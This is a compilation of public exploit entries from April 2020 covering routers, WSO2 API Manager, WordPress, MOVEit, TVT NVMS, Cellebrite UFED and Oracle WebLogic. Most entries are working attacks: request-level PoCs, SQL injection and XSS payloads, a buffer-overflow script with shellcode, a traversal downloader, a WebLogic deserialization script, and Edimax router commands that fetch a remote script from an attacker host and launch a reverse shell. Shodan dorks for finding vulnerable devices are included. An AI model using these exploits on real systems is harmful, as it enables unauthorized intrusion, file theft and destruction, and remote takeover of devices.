# Title: Huawei HG630 2 Router - Authentication Bypass
# Date: 2020-04-13
# Author: Eslam Medhat
# Vendor Homepage: www.huawei.com
# Version: HG630 V2
# HardwareVersion: VER.B
# CVE: N/A

#POC:

The default password of this router is the last 8 characters of the
device's serial number which exist in the back of the device.

An attacker can leak the serial number via the web app API like the
following:

************************Request************************
GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie:
SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm


************************Response************************
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Fri, 01 Jan 2010 09:14:47 GMT
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length: 141

while(1); /*{"DeviceName":"HG630
V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/


You can use that serial number to login to the router.

#Reference:
https://www.youtube.com/watch?v=vOrIL7L_cVc

Document Title:
===============
WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal )


##CVE not assigned yet
##Author : Raki Ben Hamouda
##Security Update : https://apim.docs.wso2.com/en/latest/


Common Vulnerability Scoring System:
====================================
8.5


Affected Product(s):
====================
WSO2 API Manager Carbon Interface

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A remote Arbitrary file delete vulnerability has been discovered in the
official WSO2 API Manager Carbon UI product .
The security vulnerability allows a remote attacker with low privileges to
perform authenticated application requests
and to delete arbitrary System files.

The vulnerability is located in the
`/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the
`extensionName` parameter
of the extension we want to delete. Remote attackers are able to delete
arbitrary files as configuration files ,database(.db) files
via authenticated POST method requests with a crafted String arbitrary
traversal files names in  "extensionName" .

The security risk of the arbitrary delete vulnerability is estimated as
High with a cvss (common vulnerability scoring system) count of 8.5.
Exploitation of the Path traversal vulnerability requires a low privilege
web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of
availability, integrity and confidentiality.

===============================

Error Generated by Server in case of file not found from 'logfile' (
broughts my atttention ...)

[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove
extension.
org.apache.axis2.AxisFault: File does not exist:
E:\api-wso2\bin\..\repository\d
eployment\server\registryextensions\commons-dir
        at
org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j
ava:531) ~[axis2_1.6.1.wso2v38.jar:?]
        at
org.apache.axis2.description.OutInAxisOperationClient.handleResponse(
OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
        at
org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO
peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
        at
org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out
InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
        at
org.apache.axis2.client.OperationClient.execute(OperationClient.java:
149) ~[axis2_1.6.1.wso2v38.jar:?]
        at
org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem
oveExtension(ResourceAdminServiceStub.java:5954)
~[org.wso2.carbon.registry.exte
nsions.stub_4.7.13.jar:?]
        at
org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.
deleteExtension(ResourceServiceClient.java:137)
[org.wso2.carbon.registry.extens
ions.ui_4.7.13.jar:?]
        at
org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS
ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
        at
org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t
omcat_9.0.22.wso2v1.jar:?]

*Error displayed in Web browser with body request:

<script type="text/javascript">
    CARBON.showErrorDialog("File does not exist:
E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");
</script>



=============================

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp

Vulnerable Parameter(s):
[+] extensionName


Server version
 3.0.0


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low
privileged web-application user account and with no user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


1-Attacker must have access to the Extension component(List ,Add ,Delete
extensions )
2-attacker  uploads any file .jar extension
3-attacker intercepts the request that follows and modifies the parameter
with traversal string:

--- PoC Session Logs [POST] ---

POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
Host: localhost:9443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0)
Gecko/20100101 Firefox/71.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
Content-Length: 22
Origin: https://localhost:9443
Connection: close
Referer:
https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B;
requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add;
region1_configure_menu=none; region3_registry_menu=visible;
region4_monitor_menu=none; region5_tools_menu=none;
current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523;
MSG15780931689110.08734318816834985=true;
MSG15780932448520.1389658752202746=true;
MSG15780934638710.11615678726759582=true;
MSG15780941514590.39351165459685944=true;
MSG15780941548760.1587776077002745=true;
MSG15780944563770.9802725740232142=true;
MSG15780944882480.28388839177015013=true;
MSG15780945113520.5908842754830942=true; menuPanel=visible;
menuPanelType=extensions
Pragma: no-cache
Cache-Control: no-cache

extensionName=../../../../INSTALL.txt

 ---------------Returned Headers in Response------------------

HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 10
Date: Sat, 04 Jan 2020 00:55:38 GMT
Connection: close
Server: WSO2 Carbon Server

# Exploit Title: Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion
# Google Dork: N/A
# Date: 2020-04-13
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: http://davidlingren.com/
# Software Link: https://wordpress.org/plugins/media-library-assistant/
# Version: 2.81
# Tested on: Windows 7 x86 SP1
# CVE : CVE-2020-11731, CVE-2020-11732

----Local File Inclusion----------------------------

There is a file inclusion vulnerability in the mla-file-downloader.php file. Example:

http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php

Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication.


----Multiple Cross-Site-Scripting-------------------

There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript. 

Note that this vulnerability requires authentication.



Tested on Windows 7 Pro SP1 32-bit and Wordpress 5.3.2

# Exploit Title: B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)
# Date: 2020-04-13
# Exploit Author: Andy Bowden
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 10 x86

#Instructions:
# Run the script to create the Crash.txt file. Copy the contents of the file and paste them into the search box and then click decode. 

f = open("crash.txt", "wb")

padding1   = b"ERCDERCD"
padding1  += b"\x90" * 100

# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
# cmd=calc.exe exitfunc=thread -f python
payload =  b""
payload += b"\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
payload += b"\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
payload += b"\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
payload += b"\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
payload += b"\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
payload += b"\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
payload += b"\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
payload += b"\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
payload += b"\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
payload += b"\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
payload += b"\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
payload += b"\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
payload += b"\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
payload += b"\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
payload += b"\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
payload += b"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
payload += b"\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

egghunter  = b"\x8B\xFD"                # mov edi,ebp
egghunter += b"\xB8\x45\x52\x43\x44"    # mov eax,45525344 ERCD                       
egghunter += b"\x47"                    # inc edi                                                                 
egghunter += b"\x39\x07"                # cmp dword ptr ds:[edi],eax                                  
egghunter += b"\x75\xFB"                # jne                             
egghunter += b"\x39\x07"                # cmp dword ptr ds:[edi],eax                                  
egghunter += b"\x75\xF7"                # jne        
egghunter += b"\xFF\xE7"                # jmp edi

buf = padding1 + payload 
buf += b"\x90" * (580 - len(padding1 + payload))
buf += egghunter
buf += b"\x90" * (620 - len(buf))
buf += b"\x90\x90\xEB\xCE"
buf += b"\x86\x1e\x40" #00401e86

f.write(buf)
f.close()

Document Title:
===============
WSO2 API Manager Stored XSS Vulnerability


Common Vulnerability Scoring System:
====================================
5.4

CVE :
===================
N/A

Security Advisory :
===================
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700


Latest Release after Fixing Vuln:
===================================
V 3.1.0 (https://wso2.com/library/articles/introducing-wso2-api-manager-3-1/
)


Author :
==================
Raki Ben Hamouda


Affected Product(s):
====================
WSO2 API Manager Carbon interface V3.0.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A remote Stored Cross Site Scripting has been discovered in WSO2 API
Manager Ressource Browser component).
The security vulnerability allows a remote attacker With access to the
component "Ressource Browser"
to inject a malicious code in Add Comment Feature.

The vulnerability is triggered after sending a POST request to
`/carbon/info/comment-ajaxprocessor.jsp` with Parameter
"comment=targeted&path=%2F".
Remote attackers has the ablility to spread a malware,to Hijack a session
(a session with Higher privileges), or to initiate phishing attacks.

The security risk of the Stored XSS web vulnerability is estimated as
medium with a cvss (common vulnerability scoring system) count of 5.4
Exploitation of the Stored XSS web vulnerability requires a low privilege
web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in Compromising the
server .


Request Method:
[+] POST

Module:
[+] /carbon/info/comment-ajaxprocessor.jsp

Parameters:
[+] comment=admincomment
[+] path=%2F
=======================================

POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
Host: 192.168.149.1:9443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
Content-Length: 64
Cookie: region3_registry_menu=visible; region3_metadata_menu=none;
wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e;
JSESSIONID=4B3AB3AA8895F2897685FA98C327D521;
requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none;
region4_monitor_menu=none; region5_tools_menu=none;
current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
Connection: close

comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F





==============================



HTTP/1.1 200

X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
vary: accept-encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 31 Dec 2019 10:50:00 GMT
Connection: close
Server: WSO2 Carbon Server
Content-Length: 3144


//the body of response includes attacker malicious script


<a class="closeButton icon-link registryWriteOperation"
onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete"
style="background-image:
url(../admin/images/delete.gif);position:relative;float:right">&nbsp;</a>


<iframe href=http://phishing_url>
<br/>
posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker



Proof of Concept (PoC):
=======================

//Let's suppose we're Attacking an admin with higher privileges



1-Attacker opens his account

2-add arbitrary comment


3-intercepts the request


4-add malicious script to the comment


5-admin access his account,he wants to add a comment,the malicious script
got executed


===>Admin account compromised



===============================================================================



Example malicious script :


<script>
  alert(document.cookie);
</script>



===============================================================================

# Exploit Title: TVT NVMS 1000 - Directory Traversal 
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085

import sys
import requests
import os
import time

if len(sys.argv) !=4:
  print ""
  print "Usage : python exploit.py url filename outputname"
  print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
  print ""
else:


  traversal = "../../../../../../../../../../../../../"
  filename = sys.argv[2]
  url = sys.argv[1]+traversal+filename
  outputname = sys.argv[3]
  content = requests.get(url)

  if content.status_code == 200:

    print ""
    print "Directory Traversal Succeeded"
    time.sleep(3)
    print ""
    print "Saving Output"
    os.system("touch " + outputname)
    output_write = open(outputname,"r+")
    output_write.write(content.text)
    output_write.close()

  else:

    print "Host not vulnerable to Directory Traversal!"

# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution
# Date: 2020-04-13
# Exploit Author: Wadeek
# Hardware Version: EW-7438RPn-v3 Mini
# Firmware Version: 1.23 / 1.27
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip

== Shodan Dorks ==

(Setup Mode) "HTTP/1.0 302 Redirect""Server: Boa/0.94.14rc21""http://(null)/index.asp"
(Unsetup Mode) "HTTP/1.1 401 Unauthorized""Server: Boa/0.94.14rc21""Default Name:admin Password:1234"

== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) ==

GET /wizard_reboot.asp
showSSID = "<WIRELESS-NAME>";
document.write('<font class=\"textcolor\">'+"<WIRELESS-SECURITY-KEY>"+'</font>');

== Command Execution * ==

(Setup Mode)
curl 'http://<RHOST>/goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'

(Unsetup Mode with default password)
curl 'http://<RHOST>/goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'

== Cross-Site Request Forgery -> Command Execution * ==

<form action="http://edimaxext.setup/goform/mp" method="POST">
<input type="hidden" name="command" value="|| busybox wget -O - http://<LHOST>/delivery.sh | /bin/sh">
<input type="submit" value="">
</form>

* [ delivery.sh ]
--------------------------------------------------------------------------------------
# (msfvenom) linux/mipsbe/shell/reverse_tcp
cd /tmp/
busybox wget -O reverse http://<LHOST>/reverse
busybox chmod +x reverse
./reverse &
--------------------------------------------------------------------------------------

# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection 
# Google Dork: inurl:human.aspx intext:moveit
# Date: 2020-04-12
# Exploit Authors: Aviv Beniash, Noam Moshe
# Vendor Homepage: https://www.ipswitch.com/
# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
# CVE : CVE-2019-16383
# 
# Related Resources:
# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
# https://nvd.nist.gov/vuln/detail/CVE-2019-16383

# Description:
# The API call for revoking logon tokens is vulnerable to a
# Time based blind SQL injection via the 'token' parameter

# MSSQL payload:

POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

token='; WAITFOR DELAY '0:0:10'--


# MySQL payload:

POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

token=' OR SLEEP(10);

KL-001-2020-001 : Cellebrite Hardcoded ADB Authentication Keys

Title: Cellebrite Hardcoded ADB Authentication Keys
Advisory ID: KL-001-2020-001
Publication Date: 2020.04.13
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2020-001.txt


1. Vulnerability Details

     Affected Vendor: Cellebrite
     Affected Product: UFED
     Affected Version: 5.0 - 7.29
     Platform: Embedded Windows
     CWE Classification: CWE-321: Use of hardcoded cryptographic keys
     CVE ID: CVE-2020-11723


2. Vulnerability Description

     Cellebrite UFED uses four hardcoded RSA private keys to
     authenticate to the ADB daemon on target devices. Extracted
     keys can be used to place evidence onto target devices when
     performing a forensic extraction.


3. Technical Description

     The AndroidLib.dll file will be found in the Program Files
     directory at the following path: C:\Program Files\Cellebrite
     Mobile Synchronization\UFED Touch\AndroidLib.dll

     This file contains the code used to authenticate to the ADB
     daemon on devices to be forensically imaged. This library
     relies on the CryptImportKey function to import a private key
     for use during this operation. The bytes used to repsent the
     key are hardcoded into the AndroidLib.dll file. This file may be
     protected by Themida but can be recovered through deobfuscation
     techniques.

     The CryptImportKey function uses a private key structure called:
     MS PRIVATEKEYBLOB. Keys that are following this format can be
     found by searching for "RSA2" as US-ASCII values inside of the
     AndroidLib.dll file. There are three keys available between
     the versions 5.0 and 7.1.

       0x6c598  952  ?PrivateKey1@ADBAuth@@0QBEB
       Ordinal_952                                     XREF[2]:     Entry Point(*), 100867b4(*)
       ?PrivateKey1@ADBAuth@@0QBEB
       1006c598 07              ??         07h
       1006c599 02              ??         02h
       1006c59a 00              ??         00h
       1006c59b 00              ??         00h
       1006c59c 00              ??         00h
       1006c59d a4              ??         A4h
       1006c59e 00              ??         00h
       1006c59f 00              ??         00h
       1006c5a0 52              ??         52h    R
       1006c5a1 53              ??         53h    S
       1006c5a2 41              ??         41h    A
       1006c5a3 32              ??         32h    2
       ...


       0x6ca30  953  ?PrivateKey2@ADBAuth@@0QBEB
       Ordinal_953                                     XREF[2]:     Entry Point(*), 100867b8(*)
       ?PrivateKey2@ADBAuth@@0QBEB
       1006ca30 07              ??         07h
       1006ca31 02              ??         02h
       1006ca32 00              ??         00h
       1006ca33 00              ??         00h
       1006ca34 00              ??         00h
       1006ca35 a4              ??         A4h
       1006ca36 00              ??         00h
       1006ca37 00              ??         00h
       1006ca38 52              ??         52h    R
       1006ca39 53              ??         53h    S
       1006ca3a 41              ??         41h    A
       1006ca3b 32              ??         32h    2
       ...


       0x6cec8  954  ?PrivateKey3@ADBAuth@@0QBEB
       Ordinal_954                                     XREF[2]:     Entry Point(*), 100867bc(*)
       ?PrivateKey3@ADBAuth@@0QBEB
       1006cec8 07              ??         07h
       1006cec9 02              ??         02h
       1006ceca 00              ??         00h
       1006cecb 00              ??         00h
       1006cecc 00              ??         00h
       1006cecd a4              ??         A4h
       1006cece 00              ??         00h
       1006cecf 00              ??         00h
       1006ced0 52              ??         52h    R
       1006ced1 53              ??         53h    S
       1006ced2 41              ??         41h    A
       1006ced3 32              ??         32h    2
       ...


     A fourth key can be found within the KnockoutNG EPR file but
     exists in the normally used PEM format:

       00000000  2d 2d 2d 2d 2d 42 45 47  49 4e 20 52 53 41 20 50  |-----BEGIN RSA P|
       00000010  52 49 56 41 54 45 20 4b  45 59 2d 2d 2d 2d 2d 0a  |RIVATE KEY-----.|
       00000020  4d 49 49 45 70 51 49 42  41 41 4b 43 41 51 45 41  |MIIEpQIBAAKCAQEA|
       00000030  75 74 72 41 62 39 37 43  74 4e 6e 6d 2b 57 53 5a  |utrAb97CtNnm+WSZ|
       00000040  7a 52 6b 2b 53 61 6c 50  32 6c 68 47 48 62 37 35  |zRk+SalP2lhGHb75|
       ...

     Once extracted, the keys can be converted into PEM using the
     openssl binary and are then available for use by the stock
     android adb client.

       $ ls -la
       total 36
       drwxr-xr-x 1 level level  346 Oct 19 07:04 .
       drwxr-xr-x 1 level level 2842 Oct 13 09:32 ..
       -rw------- 1 level level 1671 Sep 10 06:56 cellebrite_adb_key1
       -rw-r--r-- 1 level level  717 Sep 10 06:56 cellebrite_adb_key1.pub
       -rw------- 1 level level 1679 Sep 10 06:55 cellebrite_adb_key2
       -rw-r--r-- 1 level level  717 Sep 10 06:56 cellebrite_adb_key2.pub
       -r--r--r-- 1 level level 1736 Oct 13 09:26 cellebrite_adb_key3
       -r--r--r-- 1 level level  717 Oct 13 09:26 cellebrite_adb_key3.pub
       -rw------- 1 level level 1679 Oct 18 15:44 cellebrite_adb_key4
       -rw-r--r-- 1 level level  451 Oct 18 15:46 cellebrite_adb_key4.pub


4. Mitigation and Remediation Recommendation

     The vendor has addressed this vulnerability in UFED v7.30 update
     released March 3, 2020. Licensed users should update via the
     MyCellebrite Portal. Release notes can be found at:


https://www.cellebrite.com/en/productupdates/ufed-and-ufed-infield-7-30-provides-new-support-for-smartphones-with-huawei-kirin-processor/


5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.


6. Disclosure Timeline

     2019.12.12 - KoreLogic submits vulnerability details to Cellebrite.
     2019.12.12 - Cellebrite acknowledges receipt.
     2020.01.29 - Cellebrite informs KoreLogic that a remediation will
                  be implemented in the next scheduled release and asks
                  for coordinated disclosure following subsequent
                  customer updates. KoreLogic agrees.
     2020.03.03 - Cellebrite releases UFED v7.30.
     2020.03.04 - Cellebrite asks for disclosure to remain embargoed
                  for 2-4 weeks for existing customers to upgrade.
                  KoreLogic agrees.
     2020.04.08 - CVE requested from MITRE.
     2020.04.12 - MITRE assigns CVE-2020-11723.
     2020.04.13 - KoreLogic public disclosure.


7. Proof of Concept

    See section 3. Technical Description.


The contents of this advisory are copyright(c) 2020
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

# Exploit Title: Oracle WebLogic Server 12.2.1.4.0  -  Remote Code Execution
# Author: nu11secur1ty
# Date: 2020-03-31
# Vendor: Oracle
# Software Link:  https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip  
# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555
# CVE: CVE-2020-2555


[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
[+] Source:  readme from GitHUB


[Exploit Program Code]
--------------------------

#!/usr/bin/python
# @nu11secur1ty
import socket
import os
import sys
import struct

if len(sys.argv) < 3:
    print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)

server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)

# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)

data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data

payloadObj = open(sys.argv[3],'rb').read()

payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
payload=payload+payloadObj
